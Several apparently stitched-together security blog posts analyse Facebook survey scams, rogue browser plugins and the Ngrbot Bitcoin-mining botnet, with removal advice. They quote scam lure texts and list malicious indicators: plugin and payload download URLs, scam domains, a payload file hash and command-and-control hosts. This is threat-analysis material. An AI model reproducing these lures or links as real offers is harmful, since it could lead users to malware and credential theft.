WoW This Free-Facebook Mugs Looking Very Nice - I have Ordered Free-Facebook Mug For Me,Did you Order Yours?

Latest Facebook scam is more advanced compared to the previous scams. This one steals users Facebook Email Id, promotes other scam messages, asks users to complete survey and also install malicious browser plugin. Below seen is the sample scam post with a link to fbmugoffer.info.

The above link will take you to a page like seen below. They have well designed the webpage to look similar to that of Facebook so that people will believe it. It says "Facebook is giving away ceramic cofee mugs free of cost. Yes, you heard it right, you don't have to pay a single penny. Just verify your identity, and confirm you'nt Bot and we ship your mug right away." And asks you to like the page and Click on Continue.

When you click on continue you will be redirected to the page "http://freemug.info/mug.html" which says some stories and contains a Order now button. 

Clicking on Order now will take you to freemug.info/verify.html were it ask users to enter their Facebook email id by accessing the Mobile log in page.

After entering the Email id and clicking verify it will redirect to "http://freemug.info/final.html" were it displays available survey depending upon their location and asks users to complete them.

When examined the site http://freemug.info/mug.html found it containing script to install browser plugin with the name "Youtube Extension".

Once these plugins are installed it monitors whether user access the site facebook.com. Once accessed it runs 2 scripts http://allinfree.net/justinbieberstabbedvideo/script.js and http://allinfree.net/just/et.js which contains code to post the scam message "EXCLUSIVE!!!The Young Love Stolen Video Justin Bieber & Selena Gomez."

Below seen is the sample scam post with the malicious link justin-v10.co.cc.

Where justin-v10.co.cc contains the below page. It contains hidden share button, where ever you click on the video it will be shared on your wall.

c

Also found another variant of this scam containing link to http://embarrassingvideos.blogspot.com/?tviJOEO6 and http://upgradeyourtools.info/justin/

Which prompts you to install malicious browser plugins http://upgradeyourtools.info/plugin/youtube.crx

There are multiple variants spreading across Facebook. So people be cautious when you click on something.

CLICK HERE TO WATCH IT: http://tinyurl.com/boobs1pPis 

GUY TOUCHES 1000 BOOBS!!! INCREDIBLE!!!

Ngrbot – Bitcoin mining Botnet

A mining botnet is spreading across the internet. It mostly spreads through social networking sites and instant messenger. Once installed it downloads the mining software and uses the system resource to solve Bitcoin blocks in order to generate more Bitcoins. It also steals personal and financial information from the infected system.

The file Sexy-IMAGE-DSC0000S4DF87911.jpeg.exe D2B1FB926828778D993C1CD6C6894164 comes with a photo thumbnail to get user attention. When you click on the link it gets installed in user system.

This bot creates a copy of itself in the %USERPROFILE%\Application Data Folder and a random valued run entry to it.

Injects malicious code into the running processes and does hooking by modifying first 5 bytes of the below routines with an JMP instruction leading to the malicious routine. Downloads payload from free file hosting websites.

http://s546.hotfile.com/get/ac412325e76c9322271a960286bd486de0ba9ce1/4f10697c/2/c5b3fb429fdcb61b/86e5ee5/Bmw_M3.exe

kernel32.dll!CopyFileA

kernel32.dll!CopyFileW

kernel32.dll!CreateFileA

kernel32.dll!CreateFileW

kernel32.dll!MoveFileA

kernel32.dll!MoveFileW

ntdll.dll!LdrLoadDll

ntdll.dll!NtEnumerateValueKey

ntdll.dll!NtQueryDirectoryFile

ntdll.dll!NtResumeThread

WININET.dll!HttpSendRequestA

WININET.dll!HttpSendRequestW

WININET.dll!InternetWriteFile

WS2_32.dll!GetAddrInfoW

WS2_32.dll!send

Above seen hooks will hide the presence of the malware in the infected system. 

This bot blocks user from accessing certain security domains.

Creates following Mutex objects to mark its presence.

\BaseNamedObjects\1b37f31f-Mutex

\BaseNamedObjects\1b37f31f_0

It monitors for instant messaging process in the memory and spreads through them.

It can also spread through removable drives and it is capable of composing messages with malicious link and send them through compromised social networking account. The account can be from any of these sites Facebook, Twitter, Bebo, Friendster and Vkontakte.

It steals user credentials when they try to login certain websites. 

Bitcoin is nothing but a digital currency. The bitcoin blocks are created for every transaction made and solving these blocks will get rewarded. Botnet uses the infected system’s computaional power to mine bitcoins and earn money. Below you can see the botnet using the CUDA GPU computing to solve the bitcoin block.

The bot contacts the C & C server to get command as well as to update itself. Below seen are some of the sites contacted by the bot.

xL.x1x2.in

appupdate.org

xL.0days.me

myupload01.info

xL.a7aneek.net

xL.honeycat.org

xL.5days.in

xL.psybnc.cz

OMG! hahaha i know who visited my profile! Those tagged have visited my profile the last week!

Hai All! Here is a new variant of old survey scam going around in Facebook. This time it makes you click on the malicious link saying I know my profile visitors. To know how click on the link http://tinyurl.com/profilevieweroFORn. It also has one more link to a Fake photo with malicious link posted in the flickr webpage. So which ever link you click on you will be redirected to a page which host malicious link.

When you click on the above seen tiny url you will be redirected to a blogspot page 'profile-ghost-viewer20.blogspot.com' which runs a JavaScript easy-tricks.info/profileviewer/include.js to display the below content.

  

Like any other Facebook scam it asks you to follow few steps. This is because till now you're not affected by this scam. It requires your action to spread as well as infect your system. Once you click on the install button like said in the first step it will install an browser plugin like seen below.

The second step is a big trap. To make sure you have signed into Facebook. Because it can spread only if you have logged into Facebook account. The third step will initiate the plugin and spread the spam through your wall. The spam message need not be same it can be old or new one whatever like designed by the spammer. 

Did u notice "Like our page" in step 1, lets check that page. Looks it is promoting some videos and it already has 11,110 likes.

Now, lets see the link to the flickr photo displayed in the post. It asks you to click on malicious link to know more.  

The link easy-tricks.info/profileviewer/ will take you to easy-tricks.info/profileviewer/widget.php which will pop-up a window listing surveys to complete before you view the profile visitors.

You will only end up filling survey scams for the spammer to earn money. There is nothing legitimate here. If you have followed these steps then you're victim of this scam. I request you to uninstall the plugin immediately by going to browser options.

Switch To Red Facebook (Limited Time!)

Red Facebook installs 'Yontoo' which some AV vendors consider as Adware. The tagline used is  "Say goodbye to the boring blue profile and say hello to the new red profile!!"

When you click on the above post you're redirected to the site www.redfbprofile.info and it asks you to follow 2 steps in order to get the new red Facebook profile.

First step is to share the post with your Facebook friends. Second step is to comment something good about the post(Red Facebook) which you haven't seen yet. Once done you will be redirected to the below page.

Here download now will download a file from download.pagerage.com/PageRageSetupAff.exe and installs Yontoo browser plugin which may display ads while you're on Facebook or other sites .

Below seen is the browser plugin Yontoo1.0.1 installed.

If you’re Chrome user go to Tools->Extensions->Remove

Always install applications from trusted source and aware of the content before you share them with your friends through any social networking sites.

HEY!! LET ALL OF US TRY AND WIN THESE 4 FREE SOUTHWEST AIRLINE TICKETS AND GO SOMEWHERE WARM.WE ALL MIGHT WIN AND WE CAN VACATION TOGETHER.

Above seen is a recent Facebook scam. Clicking on the scam link will take you to a phony marketing survey and also installs an Adware program.  Below seen is the spam posted in one of the infected user’s wall.

The link in the spam will lead you to the site www.airlinesticketssr.blogspot.com. The blogspot domain is specially designed to host the scam content. Where ever you click on the below page it will redirect you to http://trax77.com this in turn identifies your location.

Only people from certain country example like US  will be shown with below site ‘try.bestairlinetickets.co’. It asks you to enter your email address and click on the continue button.

Next it will open up the fake registration page and asks ou to enter your personal information to claim your 2 free Southwest Airines Tickests.

Then it asks you to complete the 5 minutes survey which consists of 13 personal questions.

Once survey is completed it will ask you to follow 3 step processes which includes sharing the message in Facebook and installing an application called ShopAtHome browser plugin which some AV vendors detect as adware and some say it as trackware and potentially unwanted application since they are capable of monitoring browser activity and displaying results based on your search queries. Some say it redirects visits to merchant sites in order to take the affiliate fees from them automatically. Whatever may be there is nothing related to free air tickets for you.

If you’re chrome user you will be prompted with below window.  Note the list of things it can do once installed so be aware of any browser plug-in you install.

To remove the plugin. If you’re Chrome user go to Tools->Extensions->Remove

Similar variant '2 FREE Southwest Airline Tickets! (limited time only)' - Southwest Airline is currently giving away 2 FREE Tickets to all facebook users!

Domain currently active are rewards02.s3-website-us-west-1.amazonaws.com, flyfreetoday.s3-website-eu-west-1.amazonaws.com,  flyingplane.s3-website-eu-west-1.amazonaws.com, plane4.s3-website-us-east-1.amazonaws.com, flyingplane2.s3-website-eu-west-1.amazonaws.com, flyfreer.s3-website-eu-west-1.amazonaws.com.

"This girl killed herself after watching this video!" - Spanish Version

We have already seen these kind of scam spreading across English speaking countries. Similar variant seen in Spanish version. Esta Chica se suicidó, después de ver este video! El vídeo más terrible que he visto jamas!

Above seen post will take you to a site yyylike.co.cc where a specially designed image <img src="http://i.imgur.com/XG1EQ.jpg"> will be displayed like video with the title "This girl killed herself after watching this video!".

Also, it will show 3 steps to do in order to view the original video. Steps are like selecting the Like button and sharing the video on your wall. Just to spread the Scam message among your friends. It   wont allow you to jump directly to the third step it validates whether you have clicked "Like" and "share" button using script.

Even when you right click any where on the page it will display an alert message "Follow the 2 Steps It's Easy!"

Once steps are completed it will pop up a new window accessing yyylike.co.cc/video.php and saying "Click on one of the following links to view the video". The links are just to redirect to survey scam like expected nothing legitimate here. So always stay away from clicking on suspicious links.

Domains similar to yyylike.co.cc are jupilake.co.cc, karionix.co.cc, kiolopes.co.cc, cdaribe.co.cc, kalipsoo.co.cc, nahuila.co.cc, baxilok.co.cc, nahuila.co.cc, poderop.co.cc, lopoli.co.cc, juliopac.co.cc, cdaribe.co.cc, karionix.co.cc.

(LEAKED) You Wont Believe Who Nicki Minaj Got CAUGHT ON TAPE with - You will lose all respect for NICKI MINAJ after watching this video

Below seen is not any kind of video like expected, its just another survey scam spreading across Facebook. Misusing the fame of famous American artist NICKI MINAJ to get user attention and make them fall for this scam by clicking on the malicious link.

The link http://184.107.51.105/~videoz/ on the post will take you to the site http://nickivideo.s3-website-us-east-1.amazonaws.com/ hosted under the amazon web service. Recently we are seeing lot of malicious websites hosted under this web service. Will be good if people reports them as soon as they identify an abuse content hosted on their service.

When you try to play the video by clicking on the play button you will be shown with the message “Restriction To start the video, please share it again and click the play button”.

It validates whether you have shared the page or not by using a Javascript and it keeps displaying alert message until you do it. Once shared it gets displayed on your wall post and your friends might click them and spread it like how you did. Likewise it continues to spread across Facebook.

After sharing and clicking on the play button will take you to a new site youtubo.info/shirt/007-N.php containing the survey to be completed.

After all this is not any kind of video like you expected. It’s just a survey scam like many other's out there. Spammers take trending topics to attract users and set up a trap so that users click on the malicious link. Beware of what you click on and stay protected.


One more similar scam found "EMINEM BEAT UP and STABBED Outside Detroit Night Club!" or "EMINEM STABBED By CRAZZY Fan Outside L.A. NightClub!"

On clicking the scam post will take you to the site examplesofspeech.com/video/1.php like seen below,

Updated version of similar scam "OMG I Just Hate RIHANNA After Watching This Video" installs malicious browser plugin check below,

Clicking on the link will lead to a compromised webpage designed to look like Facebook and asks you to install the malicious plugin.

This page has iframe to contact malicious sites like pluginviritscript.blogspot.it to install the rogue plugin from viralscripts.it/divx2/youtube.crx. So don't ever access/install plugin from unreliable sites.